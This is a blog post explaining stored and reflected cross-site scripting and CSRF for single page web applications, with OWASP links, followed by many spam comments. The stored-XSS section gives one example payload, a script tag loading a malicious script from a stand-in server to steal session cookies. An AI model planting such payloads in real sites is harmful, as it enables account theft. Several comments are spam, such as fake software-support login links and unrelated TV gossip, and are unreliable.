Security Measures for Your Single Page Application

Building a secured application is always a puzzle for many of us. This is so true when you  need to secure a Single Page Java Web application where many things are happening on the browser which is not in your control.  This post discusses this problem along with some of the popular preventive measures available today to secure your  single page web application.

What is Single Page Application?

In earlier days web browsers were not  really powerful as we see them today.  We used to build web applications by moving most of the processing logic to the server, leaving browser as a simple mean to render the DOM returned by server. Simple user action like clicking a button, scrolling page were all handled on server. Over a period browsers became more rich in terms of functionalities and we have witnessed JavaScript emerging as powerful scripting language.

A single-page application (SPA) is a web application that interacts with the user by dynamically rewriting the current page rather than loading entire new pages from a server. In other words,  a single page application  makes use of modern browser capabilities and responds to user actions such as clicking a button,  navigating to new page etc according to the logic defined in the JavaScript running on the browser.  Let us go ahead and  take a look at some of the common security attacks and some preventive measures for them.

Common Security Attacks

The security attacks discussed in this section are not really unique to SPA, rather they are applicable for any web application per se. However SPAs are more vulnerable to attack as major portion  of the UI code is running on browser leaving all traces of user actions and server interactions on the browser running on end-user's machine.

Cross site scripting (XSS)

Cross site scripting (XSS) is a very common attack that injects malicious code into a vulnerable web application. There are two categories of XSS attacks:

Stored or Persistent XSS

Stored or Persistent XSS attacks happen when an application takes user input without validating the contents and save it on server database. Later when user navigates to a page which displays the user input from previous page, server retrieves this data from database and embeds the content in HTML DOM without proper HTML escaping.
For example, consider a  page with a field that allows user to add comments. If there is no proper validation for this field, a hacker may try adding HTML script tags as value for this field. This can be link to malicious JavaScript file from a server owned by hacker as shown here:  <script src=”http://some-server.com/malicious-script.js”> </script>  Web app fails to prevent such input, and stores it as value for comment field. When the application displays this comment later, the browser parses the JavaScript tag that was added as value for comment and any  regular HTML tag. This malicious script can harm the user in many ways. For instance, the script can contain code to POST customer data such as session cookie, unsecured access token etc to a REST API owned by hacker. A hacker can use this information later for hacking the user account.

Reflective XSS

In the case of reflective XSS, the malicious script is injected by appending to the URL.  Let us take  an example to get more clear picture. Suppose a hacker is visiting a site , for e.g: www.jobinesh.com.  As next  hacker may try appending some arbitrary parameter value to URL and if the site responds back with parameter typed as is without properly escaping it, then this site may be vulnerable for reflective XSS attack.  Here is an example: https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

You can learn more about XSS here: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Here are some options to prevent XSS: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet


Cross-Site Request Forgery (CSRF)

Cross site request forgery (CSRF),  is an attack that steals the current user's logged-in session from browser(via Session Cookie)  and uses that stolen session to execute unwanted action in an application to which a user is logged in.

You can learn more about CSRF here: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
To learn on preventive measures, visit the following link:  https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet




Comments

  1. Nice journal terribly fascinating and helpful info on your website. Thanks for sharing the journal and this nice info that is certainly about to facilitate us. We will be updating this post with new information to our knowledge box.

    Cheapest dedicated

    ReplyDelete
  2. Network Security is a considering fact in the world of information technology. Network Security Solution Providers played an important role in defending these kind of cyber attacks.

    ReplyDelete
  3. Nice Blog Post, it's very informative regarding IELTS courses. keep sharing.....thanks

    IELTS Coaching Institute in Jaipur

    ReplyDelete
  4. This comment has been removed by the author.

    ReplyDelete
  5. I read your blog now share great information here. Web Designer

    ReplyDelete
  6. Thanks for sharing this blog. i'm really impresses with this blog. it teaches me a lot.
    web design training programs
    php institute in chennai
    magento course in chennai

    ReplyDelete
  7. The ethereumpro our website is one of the world's most prominent ethereum mining profitability calculator that is working for excavators wherever all through the world. It is an enrolled site having a brilliant working history in mining. Likewise, giving surprising associations to their customers. The decision highlight of this site is it enrolled. Additionally, check from a wide extent of accidents or fakes. Visit our site it is secure for this system.

    ReplyDelete
  8. In present era where cyberattacks have become normal, this blog helped me in understanding Business Security Solutions Houstoncan avoid normal security flaws within a given network.

    ReplyDelete

  9. I went through your blog its really interesting and holds an informative content. Thanks for uploading such a wonderful blog.
    python classes near Bellandur|python classes in Marathahalli
    selenium testing classes in Bangalore|selenium testing classes near Bellandur

    ReplyDelete
  10. The registrations and auditions for the Bigg Boss 13 are going to start soon. The official list of contestants is not yet announced by the officials. That will be announced by the makers on the inaugural day which is 15 the of September. bigg boss 13 contestants name list with photo and details Though a few rumored names are coming up as the expected celebrity contestants of the year. They are Nia Sharma, Raghav Juyal, Punit Pathak, Divyanka Tripathi, Garima Chaurasia, Ridhima Pandit, Aditya Narayan, Jasmin Bhasin, Zain Imam, Bhuvan Bam, Chetna Pande, Krystle D’Souza, and Devoleena Bhattacharjee. This year too, the show will be back with a new theme and the star host, Salman Khan. Though the theme is not declared yet officially. Stay tuned with us to know more about the show Bigg Boss 13.

    ReplyDelete
  11. The registrations and auditions for the Bigg Boss 13 are going to start soon. The official list of contestants is not yet announced by the officials. That will be announced by the makers on the inaugural day which is 15 the of September. bigg boss 13 contestants name list with photo Though a few rumored names are coming up as the expected celebrity contestants of the year. They are Nia Sharma, Raghav Juyal, Punit Pathak, Divyanka Tripathi, Garima Chaurasia, Ridhima Pandit, Aditya Narayan, Jasmin Bhasin, Zain Imam, Bhuvan Bam, Chetna Pande, Krystle D’Souza, and Devoleena Bhattacharjee. This year too, the show will be back with a new theme and the star host, Salman Khan. Though the theme is not declared yet officially. Stay tuned with us to know more about the show Bigg Boss 13.

    ReplyDelete
  12. This comment has been removed by the author.

    ReplyDelete
  13. The great information that you shared. It will help all of them. Thanks for posting. Keep maintain the updates
    PHP Development Companies in Chennai
    |
    PHP Development Company
    |
    PHP web development services
    |

    ReplyDelete
  14. The article was up to the point and described the information very effectively. Thanks to blog author for wonderful and informative post.
    website designing Pakistan

    ReplyDelete
  15. Nice blog, thanks for sharing with us this interesting blog. Visit OGEN Infosystem for Website Designing and PPC Services in Delhi, India.
    Web Development Company

    ReplyDelete
  16. Now you can download office offline and online both. Office facilitates to activate it online.For that you have need of activation key and go to official site, login your account and enter valid key and activate it.Other wise you can install and then put key and activate offline also on your computer system successfully. If you get any of problem on your computer so contact to the support team .

    Bullguard Login
    Office Login
    Office Login
    Mcafee Login
    AVG Login
    Norton Login
    webroot login
    webroot.com/safe
    Turbotax Login

    ReplyDelete
  17. TurboTax is the best Accounting Software to maintain your tax pay account. You use it growth your business for this reason, that its have a brilliant team who always available for customers support and satisfy with them their answer, so if you have any issue with Turbotax visit here TurboTax Support and get free.



    Dragon naturally speaking support
    HP Printer Offline
    Office.com/setup
    TurboTax Support
    Garmin Login
    Avg login

    ReplyDelete
  18. Very interesting, good job and thanks for sharing such a good blog. your article is so convincing that I never stop myself to say something about it. You’re doing a great job. Keep it up

    aws Training in Bangalore
    python Training in Bangalore
    hadoop Training in Bangalore
    angular js Training in Bangalore
    bigdata analytics Training in Bangalore

    ReplyDelete
  19. Financial sector has undergone drastic technological shifts in a comparatively short span of time. The shifts have been incorporated because of Growing Technology, Customer Demands, etc. Take a glance over some of the legacy Cross-platform App Development Company. These are so dynamic and efficient that it will cost you less time, more functionality, good output returns.

    ReplyDelete

Post a Comment